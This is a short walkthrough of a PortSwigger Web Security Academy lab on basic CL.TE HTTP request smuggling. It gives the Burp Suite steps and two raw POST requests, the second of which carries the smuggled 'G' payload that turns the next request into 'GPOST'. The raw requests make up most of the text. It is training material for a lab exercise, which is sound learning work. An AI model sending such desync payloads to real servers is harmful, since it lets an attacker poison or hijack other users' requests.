HTTP request smuggling, basic CL.TE vulnerability
Welcome to request smuggling. Prepare to suffer.
Start by installing the HTTP Request Smuggling extension from the Burp store (Extender -> BApp Store -> HTTP Request Smuggler).
The demo provided by Burp is a bit out of date. Right click your GET request for the main page and "Launch Smuggle Probe".
The results will be available in the "Target" tab.
The first request generated should look like this:
POST / HTTP/1.1
Host: ac411f981f8ab81880de0f9f00830076.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
Connection: close
Cookie: session=udGz2ggnMBfm4MyxVJKgK3p4ck7Ck9PU
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
Transfer-Encoding: chunked

0

Send it to repeater and append a G at the end so that it looks like this:
POST / HTTP/1.1
Host: ac411f981f8ab81880de0f9f00830076.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
Connection: close
Cookie: session=udGz2ggnMBfm4MyxVJKgK3p4ck7Ck9PU
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G

Since this is request smuggling, we'll have to send 2 requests to trigger the exploit. If we're right, the "G" should slip into the 2nd request.
Simply click Send twice in Repeater and you'll get an "Unrecognized method GPOST" error and a lab complete prompt. Good job!